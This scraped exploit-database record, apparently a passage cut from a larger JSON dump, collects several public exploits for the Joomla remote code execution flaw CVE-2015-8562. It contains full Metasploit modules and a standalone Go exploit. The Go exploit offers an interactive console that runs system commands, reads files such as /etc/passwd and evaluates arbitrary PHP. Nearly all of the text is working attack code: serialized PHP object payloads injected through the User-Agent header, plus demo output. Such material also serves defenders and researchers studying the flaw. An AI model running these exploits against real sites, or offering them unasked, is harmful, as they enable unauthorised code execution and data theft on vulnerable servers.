The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\r\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\r\n },\r\n 'Author' =>\r\n [\r\n 'Marc-Alexandre Montpas', # discovery\r\n 'Christian Mehlmauer' # metasploit module\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' =>\r\n [\r\n ['CVE', '2015-8562'],\r\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\r\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\r\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\r\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\r\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\r\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => 'php',\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\r\n 'DisclosureDate' => 'Dec 14 2015',\r\n 'DefaultTarget' => 0)\r\n )\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),\r\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\r\n ], self.class)\r\n end\r\n\r\n def check\r\n res = send_request_cgi({'uri' => target_uri.path })\r\n\r\n unless res\r\n vprint_error(\"Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n unless res.headers['X-Powered-By']\r\n vprint_error(\"Unable to determine the PHP version.\")\r\n return Exploit::CheckCode::Unknown\r\n end\r\n\r\n php_version, rest = 
res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\r\n version = Gem::Version.new(php_version)\r\n vulnerable = false\r\n\r\n # check for ubuntu and debian specific versions. Was fixed in\r\n # * 5.5.9+dfsg-1ubuntu4.13\r\n # * 5.3.10-1ubuntu3.20\r\n # * 5.4.45-0+deb7u1\r\n # Changelogs (search for CVE-2015-6835 or #70219):\r\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\r\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\r\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\r\n if rest && rest.include?('ubuntu')\r\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\r\n vprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\")\r\n\r\n if version > Gem::Version.new('5.5.9')\r\n vulnerable = false\r\n elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')\r\n vulnerable = false\r\n elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')\r\n vulnerable = false\r\n else\r\n vulnerable = true\r\n end\r\n elsif rest && rest.include?('+deb')\r\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\r\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\r\n\r\n if version > Gem::Version.new('5.4.45')\r\n vulnerable = false\r\n elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'\r\n vulnerable = false\r\n else\r\n vulnerable = true\r\n end\r\n else\r\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\r\n vulnerable = true if version <= Gem::Version.new('5.4.44')\r\n vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))\r\n vulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12'))\r\n end\r\n\r\n unless vulnerable\r\n 
vprint_error('This module currently does not work against this PHP version')\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') })\r\n if res && res.code == 200 && res.body && res.body.include?('<author>Joomla! Project</author>')\r\n joomla_version = res.body.scan(/<version>([\\d\\.]+)<\\/version>/i).flatten.first || ''\r\n unless joomla_version.empty?\r\n vprint_status(\"Detected Joomla version #{joomla_version}\")\r\n return Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6')\r\n end\r\n end\r\n\r\n res.get_html_meta_elements.each do |element|\r\n if element.attributes['name'] &&\r\n /^generator$/i === element.attributes['name'] &&\r\n element.attributes['content'] &&\r\n /joomla/i === element.attributes['content'].value\r\n return Exploit::CheckCode::Detected\r\n end\r\n end\r\n\r\n Exploit::CheckCode::Safe\r\n end\r\n\r\n # gets a random 4 byte UTF-8 character\r\n def get_terminator\r\n # valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF\r\n [rand(0x10000..0x10ffff)].pack('U*')\r\n end\r\n\r\n def get_payload(header_name)\r\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\r\n pre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\r\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\r\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\r\n t1000 = get_terminator\r\n return \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{t1000}\"\r\n end\r\n\r\n def print_status(msg='')\r\n super(\"#{peer} - #{msg}\")\r\n end\r\n\r\n def 
print_error(msg='')\r\n super(\"#{peer} - #{msg}\")\r\n end\r\n\r\n def exploit\r\n if check == Exploit::CheckCode::Safe && datastore['FORCE'] == false\r\n print_error('Target seems safe, so we will not continue.')\r\n return\r\n end\r\n\r\n print_status(\"Sending payload ...\")\r\n header_name = Rex::Text.rand_text_alpha_upper(5)\r\n res = send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path,\r\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\r\n })\r\n fail_with(Failure::Unknown, 'No response') if res.nil?\r\n session_cookie = res.get_cookies\r\n send_request_cgi({\r\n 'method' => 'GET',\r\n 'uri' => target_uri.path,\r\n 'cookie' => session_cookie,\r\n 'headers' => {\r\n header_name => Rex::Text.encode_base64(payload.encoded)\r\n }\r\n })\r\n end\r\nend\n\n# 0day.today [2018-03-02] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24763"}], "metasploit": [{"lastseen": "2019-11-25T20:45:53", "bulletinFamily": "exploit", "description": "Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. By storing user supplied headers in the databases session table it's possible to truncate the input by sending an UTF-8 character. The custom created payload is then executed once the session is read from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. In later versions the deserialisation of invalid session data stops on the first error and the exploit will not work. 
The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n", "modified": "2017-08-29T00:17:58", "published": "2015-12-15T16:37:45", "id": "MSF:EXPLOIT/MULTI/HTTP/JOOMLA_HTTP_HEADER_RCE", "href": "", "type": "metasploit", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Joomla\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',\n 'Description' => %q{\n Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5.\n By storing user supplied headers in the databases session table it's possible to truncate the input\n by sending an UTF-8 character. The custom created payload is then executed once the session is read\n from the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13.\n In later versions the deserialisation of invalid session data stops on the first error and the\n exploit will not work. 
The PHP Patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and\n 5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1.\n },\n 'Author'\t=>\n [\n 'Marc-Alexandre Montpas', # discovery\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['CVE', '2015-8562'],\n ['EDB', '38977'], # PoC from Gary\n ['EDB', '39033'], # Exploit modified to use \"X-Forwarded-For\" header instead of \"User-Agent\"\n ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],\n ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],\n ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],\n ['URL', 'https://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],\n ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'],\n ['URL', 'https://bugs.php.net/bug.php?id=70219']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]],\n 'DisclosureDate' => 'Dec 14 2015',\n 'DefaultTarget' => 0)\n )\n\n register_options(\n [\n OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])\n ])\n\n register_advanced_options(\n [\n OptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]),\n ])\n end\n\n def check\n res = send_request_cgi({'uri' => target_uri.path })\n\n unless res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n unless res.headers['X-Powered-By']\n vprint_error(\"Unable to determine the PHP version.\")\n return Exploit::CheckCode::Unknown\n end\n\n online = joomla_and_online?\n 
unless online\n vprint_error(\"Unable to detect joomla on #{target_uri.path}\")\n return Exploit::CheckCode::Safe\n end\n\n php_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || ''\n version = Gem::Version.new(php_version)\n vulnerable = false\n\n # check for ubuntu and debian specific versions. Was fixed in\n # * 5.5.9+dfsg-1ubuntu4.13\n # * 5.3.10-1ubuntu3.20\n # * 5.4.45-0+deb7u1\n # Changelogs (search for CVE-2015-6835 or #70219):\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog\n # http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog\n # http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog\n if rest && rest.include?('ubuntu')\n sub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || ''\n vprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.5.9')\n vulnerable = false\n elsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13')\n vulnerable = false\n elsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20')\n vulnerable = false\n else\n vulnerable = true\n end\n elsif rest && rest.include?('+deb')\n sub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || ''\n vprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\")\n\n if version > Gem::Version.new('5.4.45')\n vulnerable = false\n elsif version == Gem::Version.new('5.4.45') && sub_version != '7u1'\n vulnerable = false\n else\n vulnerable = true\n end\n else\n vprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\")\n vulnerable = true if version <= Gem::Version.new('5.4.44')\n vulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28'))\n vulnerable = true if version.between?(Gem::Version.new('5.6.0'), 
Gem::Version.new('5.6.12'))\n end\n\n unless vulnerable\n vprint_error('This module currently does not work against this PHP version')\n return Exploit::CheckCode::Safe\n end\n\n j_version = joomla_version\n unless j_version.nil?\n vprint_status(\"Detected Joomla version #{j_version}\")\n return Exploit::CheckCode::Appears if Gem::Version.new(j_version) < Gem::Version.new('3.4.6')\n end\n\n return Exploit::CheckCode::Detected if online\n\n Exploit::CheckCode::Safe\n end\n\n def get_payload(header_name)\n pre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\"\n pre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\n return \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{Rex::Text::rand_4byte_utf8}\"\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def exploit\n if check == Exploit::CheckCode::Safe && !datastore['FORCE']\n print_error('Target seems safe, so we will not continue.')\n return\n end\n\n print_status(\"Sending payload ...\")\n header_name = Rex::Text.rand_text_alpha_upper(5)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\n })\n fail_with(Failure::Unknown, 'No response') if res.nil?\n session_cookie = res.get_cookies\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'cookie' => session_cookie,\n 'headers' => {\n header_name => Rex::Text.encode_base64(payload.encoded)\n }\n })\n 
end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/joomla_http_header_rce.rb"}], "packetstorm": [{"lastseen": "2016-12-05T22:16:56", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-31T00:00:00", "published": "2015-12-31T00:00:00", "href": "https://packetstormsecurity.com/files/135100/Joomla-3.4.5-Object-Injection.html", "id": "PACKETSTORM:135100", "type": "packetstorm", "title": "Joomla 3.4.5 Object Injection", "sourceData": "`package main \n \n/* \n************************************************************************** \n* Exploit Title: Joomla 1.5.x to 3.4.5 Object Injection Exploit \n* Exploit Author: Khashayar Fereidani ( http://fereidani.com ) \n* Version: 1.5.x to 3.4.5 \n* CVE : CVE-2015-8562 \n************************************************************************** \n* THIS EXPLOIT PUBLISHED ONLY FOR EDUCATIONAL PROPOSES ANY ILLEGAL USAGE \n* IS ON YOUR OWN RESPONSIBILITY \n************************************************************************** \n* How to run : (you need golang compiler from golang.org) \n* go run exploit.go http://target/path \n* or \n* go build exploit.go \n* ./exploit http://target/path \n************************************************************************** \n* DEMO : \n \n$ ./exploit 192.168.1.113/joomla \n############################################### \n# Joomla Remote Command Execution 0day Exploit \n# Exploited by: Khashayar Fereidani \n# http://fereidani.com \n# Vulnerable Versions: 1.5.x to 3.4.5 \n############################################### \n \nAttacking to http://FILTERED.TLD/joomla/ \nTarget is vulnerable ! 
\n# Command Line Documentation : \nread FILEPATH read file from FILEPATH \ndir DIRPATH list directory in DIRPATH \nexec COMMAND execute system command \neval phpcode evaluate PHP Code \nhelp display this help \nexit close exploit console \n \n[*] Examples: \nread /etc/passwd \ndir /etc/ \nexec ls -lah \neval include('/etc/passwd') \n \n \nroot@joomla:$ exec uname -a \nLinux vm2.local 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:16:20 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux \nroot@joomla:$ \n \n*/ \n \nimport ( \n\"fmt\" \n\"net/http\" \n\"regexp\" \n\"os\" \n\"io/ioutil\" \n\"bytes\" \n\"net/http/cookiejar\" \n\"net/url\" \n\"bufio\" \n\"strings\" \n) \n \n \nvar target string; \n \n \nvar helpString=`# Command Line Documentation : \nread FILEPATH read file from FILEPATH \ndir DIRPATH list directory in DIRPATH \nexec COMMAND execute system command \neval phpcode evaluate PHP Code \nhelp display this help \nexit close exploit console \n \n[*] Examples: \nread /etc/passwd \ndir /etc/ \nexec ls -lah \neval include('/etc/passwd') \n \n` \n \nvar validHttpUrl=regexp.MustCompile(\"^http[s]{0,1}://\") \n \nvar resultRegex=regexp.MustCompile(\"(?sm)iMH3r3=(.*)\") \n \nvar cmdRegex=regexp.MustCompile(\"(\\\\w+)\\\\s(.+)\") \n \nvar newLine=regexp.MustCompile(\"[\\\\n\\\\r]\") \n \nvar client *http.Client \n \nfunc newRequest(command string) *http.Request{ \nvalues:=url.Values{} \nvalues.Set(\"1\",\"echo('iMH3r3=');\"+command+\";\") \n \nreq,err:=http.NewRequest(\"POST\",target,bytes.NewBufferString(values.Encode())) \n \nif err!=nil{ \npanic(err) \n} \n 
\nreq.Header.Set(\"User-Agent\",`123}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:43:\"eval($_POST[1]);JFactory::getConfig();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}`+\"\\xf0\\xfd\\xfd\\xfd\") \nreq.Header.Add(\"Content-Type\", \"application/x-www-form-urlencoded\") \nreturn req \n} \n \n \nfunc escape(str string) string{ \nreturn strings.Replace(str,\"'\",\"\\\\'\",-1) \n} \n \n \nfunc runCommand(command string){ \nres,err:=client.Do(newRequest(command)) \n \nif err!=nil{ \nfmt.Println(err.Error()) \n}else{ \ndefer res.Body.Close() \nresBytes,err:=ioutil.ReadAll(res.Body) \nstr:=string(resBytes) \n \nif err!=nil{ \nfmt.Println(err) \n} \nmatch:=resultRegex.FindStringSubmatch(str) \nif len(match)>0{ \nfmt.Print(match[0][7:]) \n} \n} \n \n} \n \n \nfunc confirm() bool{ \nres,err:=client.Do(newRequest(\"\")) \n \nif err!=nil{ \nfmt.Println(err) \nreturn false \n}else{ \nif res.StatusCode==500{ \nfmt.Println(\"Patched PHP Version :( !\") \nreturn false \n} \ndefer res.Body.Close() \nresBytes,err:=ioutil.ReadAll(res.Body) \nstr:=string(resBytes) \n \nif err!=nil{ \nfmt.Println(err) \n} \nmatch:=resultRegex.FindStringSubmatch(str) \nif len(match)>0{ \nreturn true \n}else{ \nreturn false \n} \n} \n} \n \nfunc main(){ \nfmt.Print(`############################################### \n# Joomla Remote Command Execution 0day Exploit \n# Exploited by: Khashayar Fereidani \n# http://fereidani.com \n# Vulnerable Versions: 1.5.0 to 3.4.5 \n############################################### \n`) \noptions := cookiejar.Options{} \n \njar, err := cookiejar.New(&options) \nif err != nil { \npanic(err) \n} \n \nclient = &http.Client{ \nJar:jar, \n} \n \n \n \nif len(os.Args)<2{ 
\nfmt.Println(\"Insufficient input , please run ./exploit http://targeturl/path/\") \nreturn \n} \n \ntarget=os.Args[1] \nif(!validHttpUrl.MatchString(target)){ \ntarget=\"http://\"+target \n} \n \nif string(target[len(target)-1])!=\"/\"{ \ntarget+=\"/\" \n} \n \nfmt.Println(\"Attacking to \",target) \n \n \nres,err:=client.Do(newRequest(\"\")) \nif err!=nil{ \nfmt.Println(\"Request Error:\",err) \nreturn \n} \nioutil.ReadAll(res.Body) \nres.Body.Close() \n \nif confirm(){ \nfmt.Println(\"Target is vulnerable !\") \n//runCommand(\"system('ls -la')\") \nstdinreader := bufio.NewReader(os.Stdin) \n \nfmt.Println(helpString) \nfor { \nvar line string \nfmt.Print(\"root@joomla:$ \") \nline,_=stdinreader.ReadString('\\n') \nline=newLine.ReplaceAllString(line,\"\") \nmatch:=cmdRegex.FindStringSubmatch(line) \nif len(match)<3 { \nif (line==\"exit\"){ \nreturn \n} \n \nif !(line==\"help\"){ \nfmt.Println(\"Wrong input !\") \n} \n \nfmt.Println(helpString) \n}else{ \ncmd:=match[1] \ninput:=escape(match[2]) \nswitch cmd { \ncase \"exec\": \nrunCommand(\"system('\"+input+\"')\") \ncase \"read\": \nrunCommand(\"readfile('\"+input+\"')\") \ncase \"dir\": \nrunCommand(\"$a=scandir('\"+input+\"');foreach($a as $v){echo $v.\\\"\\\\n\\\";}\") \ncase \"eval\": \nrunCommand(match[2]) \n} \n} \n} \n}else{ \nfmt.Println(\"Target is not vulnerable!\") \n} \n \n \n} \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/135100/joomla345-exec.txt"}, {"lastseen": "2016-12-05T22:25:02", "bulletinFamily": "exploit", "description": "", "modified": "2015-12-17T00:00:00", "published": "2015-12-17T00:00:00", "href": "https://packetstormsecurity.com/files/134949/Joomla-HTTP-Header-Unauthenticated-Remote-Code-Execution.html", "id": "PACKETSTORM:134949", "type": "packetstorm", "title": "Joomla HTTP Header Unauthenticated Remote Code Execution", "sourceData": "`## \n# This module requires 
Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution', \n'Description' => %q{ \nJoomla suffers from an unauthenticated remote code execution that affects all versions from 1.5.0 to 3.4.5. \nBy storing user-supplied headers in the database's session table it's possible to truncate the input \nby sending a UTF-8 character. The custom-created payload is then executed once the session is read \nfrom the database. You also need to have a PHP version before 5.4.45 (including 5.3.x), 5.5.29 or 5.6.13. \nIn later versions the deserialisation of invalid session data stops on the first error and the \nexploit will not work. The PHP patch was included in Ubuntu versions 5.5.9+dfsg-1ubuntu4.13 and \n5.3.10-1ubuntu3.20 and in Debian in version 5.4.45-0+deb7u1. 
\n}, \n'Author' => \n[ \n'Marc-Alexandre Montpas', # discovery \n'Christian Mehlmauer' # metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n['CVE', '2015-8562'], \n['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'], \n['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'], \n['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'], \n['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html'], \n['URL', 'https://bugs.php.net/bug.php?id=70219'] \n], \n'Privileged' => false, \n'Platform' => 'php', \n'Arch' => ARCH_PHP, \n'Targets' => [['Joomla 1.5.0 - 3.4.5', {}]], \n'DisclosureDate' => 'Dec 14 2015', \n'DefaultTarget' => 0) \n) \n \nregister_options( \n[ \nOptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]), \nOptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]]) \n], self.class) \n \nregister_advanced_options( \n[ \nOptBool.new('FORCE', [true, 'Force run even if check reports the service is safe.', false]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({'uri' => target_uri.path }) \n \nunless res \nvprint_error(\"Connection timed out\") \nreturn Exploit::CheckCode::Unknown \nend \n \nunless res.headers['X-Powered-By'] \nvprint_error(\"Unable to determine the PHP version.\") \nreturn Exploit::CheckCode::Unknown \nend \n \nphp_version, rest = res.headers['X-Powered-By'].scan(/PHP\\/([\\d\\.]+)(?:-(.+))?/i).flatten || '' \nversion = Gem::Version.new(php_version) \nvulnerable = false \n \n# check for ubuntu and debian specific versions. 
Was fixed in \n# * 5.5.9+dfsg-1ubuntu4.13 \n# * 5.3.10-1ubuntu3.20 \n# * 5.4.45-0+deb7u1 \n# Changelogs (search for CVE-2015-6835 or #70219): \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.5.9+dfsg-1ubuntu4.13/changelog \n# http://changelogs.ubuntu.com/changelogs/pool/main/p/php5/php5_5.3.10-1ubuntu3.20/changelog \n# http://metadata.ftp-master.debian.org/changelogs/main/p/php5/php5_5.4.45-0+deb7u2_changelog \nif rest && rest.include?('ubuntu') \nsub_version = rest.scan(/^\\dubuntu([\\d\\.]+)/i).flatten.first || '' \nvprint_status(\"Found Ubuntu PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.5.9') \nvulnerable = false \nelsif version == Gem::Version.new('5.5.9') && Gem::Version.new(sub_version) >= Gem::Version.new('4.13') \nvulnerable = false \nelsif version == Gem::Version.new('5.3.10') && Gem::Version.new(sub_version) >= Gem::Version.new('3.20') \nvulnerable = false \nelse \nvulnerable = true \nend \nelsif rest && rest.include?('+deb') \nsub_version = rest.scan(/^\\d+\\+deb([\\du]+)/i).flatten.first || '' \nvprint_status(\"Found Debian PHP version #{res.headers['X-Powered-By']}\") \n \nif version > Gem::Version.new('5.4.45') \nvulnerable = false \nelsif version == Gem::Version.new('5.4.45') && sub_version != '7u1' \nvulnerable = false \nelse \nvulnerable = true \nend \nelse \nvprint_status(\"Found PHP version #{res.headers['X-Powered-By']}\") \nvulnerable = true if version <= Gem::Version.new('5.4.44') \nvulnerable = true if version.between?(Gem::Version.new('5.5.0'), Gem::Version.new('5.5.28')) \nvulnerable = true if version.between?(Gem::Version.new('5.6.0'), Gem::Version.new('5.6.12')) \nend \n \nunless vulnerable \nvprint_error('This module currently does not work against this PHP version') \nreturn Exploit::CheckCode::Safe \nend \n \nres = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'administrator', 'manifests', 'files', 'joomla.xml') }) \nif res && res.code == 200 && res.body && 
res.body.include?('<author>Joomla! Project</author>') \njoomla_version = res.body.scan(/<version>([\\d\\.]+)<\\/version>/i).flatten.first || '' \nunless joomla_version.empty? \nvprint_status(\"Detected Joomla version #{joomla_version}\") \nreturn Exploit::CheckCode::Appears if Gem::Version.new(joomla_version) < Gem::Version.new('3.4.6') \nend \nend \n \nres.get_html_meta_elements.each do |element| \nif element.attributes['name'] && \n/^generator$/i === element.attributes['name'] && \nelement.attributes['content'] && \n/joomla/i === element.attributes['content'].value \nreturn Exploit::CheckCode::Detected \nend \nend \n \nExploit::CheckCode::Safe \nend \n \n# gets a random 4 byte UTF-8 character \ndef get_terminator \n# valid codepoints for 4byte UTF-8 chars: U+010000 - U+10FFFF \n[rand(0x10000..0x10ffff)].pack('U*') \nend \n \ndef get_payload(header_name) \npre = \"#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|\" \npre_pay = 'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";' \npay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\" \npost_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}' \nt1000 = get_terminator \nreturn \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{t1000}\" \nend \n \ndef print_status(msg='') \nsuper(\"#{peer} - #{msg}\") \nend \n \ndef print_error(msg='') 